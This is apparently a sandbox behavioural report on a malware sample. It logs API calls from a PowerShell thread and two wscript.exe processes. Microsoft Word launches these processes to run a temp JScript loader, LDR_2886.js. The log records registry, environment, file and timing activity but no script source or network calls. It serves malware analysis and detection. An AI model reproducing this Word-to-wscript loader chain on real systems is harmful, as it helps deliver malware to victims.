Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn

Thread 0x9ac

34

0

»

Category	Operation	Information	Success	Count	Logfile

Process #33: wscript.exe

165

0

»

Information	Value
ID	#33
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:41, Reason: Child Process
Unmonitor	End Time: 00:02:01, Reason: Self Terminated
Monitor Duration	00:00:20

OS Process Information

»

Information	Value
PID	0xb6c
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B9C 0x 7F0 0x 774 0x 5CC 0x 9CC 0x B0C 0x A04 0x 38C 0x 6FC 0x 764

Threads

Thread 0xb9c

164

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:45 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 173036	1	Fn
System	Get Time	type = Performance Ctr, time = 22744582169	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffa90000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 208, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:46 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 173972	1	Fn
System	Get Time	type = Performance Ctr, time = 22838216170	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 174175	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = ìô	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:46 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 174580	1	Fn
System	Get Time	type = Performance Ctr, time = 22899250398	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:46 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 174596	1	Fn
System	Get Time	type = Performance Ctr, time = 22900185213	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 175735	1	Fn
System	Get Time	type = Ticks, time = 176015	2	Fn
System	Get Time	type = Ticks, time = 178683	1	Fn
System	Get Time	type = Ticks, time = 180539	1	Fn
System	Get Time	type = Ticks, time = 182583	1	Fn
System	Get Time	type = Ticks, time = 184439	1	Fn
System	Get Time	type = Ticks, time = 184455	3	Fn
System	Get Time	type = Ticks, time = 184627	3	Fn
System	Get Time	type = Ticks, time = 184642	1	Fn
System	Get Time	type = Ticks, time = 184658	2	Fn
System	Get Time	type = Ticks, time = 184767	2	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 184783	1	Fn
System	Get Time	type = Ticks, time = 184798	2	Fn
System	Get Time	type = Ticks, time = 184954	2	Fn
System	Get Time	type = Ticks, time = 184970	2	Fn
System	Get Time	type = Ticks, time = 184985	1	Fn
System	Get Time	type = Ticks, time = 185219	1	Fn
System	Get Time	type = Ticks, time = 185235	2	Fn
System	Get Time	type = Ticks, time = 185469	1	Fn
System	Get Time	type = Ticks, time = 185485	1	Fn
System	Get Time	type = Ticks, time = 185750	1	Fn
System	Get Time	type = Ticks, time = 186077	5	Fn
System	Get Time	type = Ticks, time = 186093	4	Fn
System	Get Time	type = Ticks, time = 186280	3	Fn
System	Get Time	type = Ticks, time = 186296	1	Fn
System	Get Time	type = Ticks, time = 187809	1	Fn
System	Get Time	type = Ticks, time = 187825	2	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x774

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 4348512		1	Fn

Process #34: wscript.exe

182

0

»

Information	Value
ID	#34
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:47, Reason: Child Process
Unmonitor	End Time: 00:02:00, Reason: Self Terminated
Monitor Duration	00:00:12

OS Process Information

»

Information	Value
PID	0x6a8
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 794 0x A34 0x 178 0x 70C 0x 4B4 0x 9C4 0x 408 0x 7C4 0x A00 0x A3C

Threads

Thread 0x794

181

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:50 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 178527	1	Fn
System	Get Time	type = Performance Ctr, time = 23299783442	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xffa90000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 32, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 32, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 32, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 32, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:52 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 180368	1	Fn
System	Get Time	type = Performance Ctr, time = 23484739601	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 180383	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = <ò	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:53 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 180898	1	Fn
System	Get Time	type = Performance Ctr, time = 23536533608	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:53 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 180898	1	Fn
System	Get Time	type = Performance Ctr, time = 23537400291	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 183550	1	Fn
System	Get Time	type = Ticks, time = 184346	2	Fn
System	Get Time	type = Ticks, time = 184377	3	Fn
System	Get Time	type = Ticks, time = 184549	1	Fn
System	Get Time	type = Ticks, time = 184564	3	Fn
System	Get Time	type = Ticks, time = 184580	3	Fn
System	Get Time	type = Ticks, time = 184720	1	Fn
System	Get Time	type = Ticks, time = 184736	2	Fn
System	Get Time	type = Ticks, time = 184751	1	Fn
System	Get Time	type = Ticks, time = 184907	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 184923	1	Fn
System	Get Time	type = Ticks, time = 184939	3	Fn
System	Get Time	type = Ticks, time = 185157	1	Fn
System	Get Time	type = Ticks, time = 185173	2	Fn
System	Get Time	type = Ticks, time = 185188	1	Fn
System	Get Time	type = Ticks, time = 185422	1	Fn
System	Get Time	type = Ticks, time = 185453	3	Fn
System	Get Time	type = Ticks, time = 185687	1	Fn
System	Get Time	type = Ticks, time = 186031	3	Fn
System	Get Time	type = Ticks, time = 186046	5	Fn
System	Get Time	type = Ticks, time = 186062	4	Fn
System	Get Time	type = Ticks, time = 186249	1	Fn
